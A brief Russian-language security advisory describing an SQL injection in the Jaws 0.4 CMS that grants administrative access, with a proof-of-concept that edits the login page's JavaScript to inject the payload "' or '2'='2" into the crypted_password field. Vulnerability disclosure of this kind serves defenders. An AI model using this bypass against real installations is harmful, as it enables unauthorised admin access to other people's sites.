Программа: Jaws 0.4 

Уязвимость SQL инъекции в Jaws позволяет удаленному пользователю получить административный доступ к приложению.
Удаленный пользователь может внедрить SQL комадны в “user”, “password” и "crypted_password" переменные. 

Пример (измените javascript функцию в Login.html): 

<script type="text/javascript">

function crypt_form(form) {
var new_password = calcMD5(form.password.value);
form.crypted_password.value = "' or '2'='2";
form.password.value = "";
return true;

</script>

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии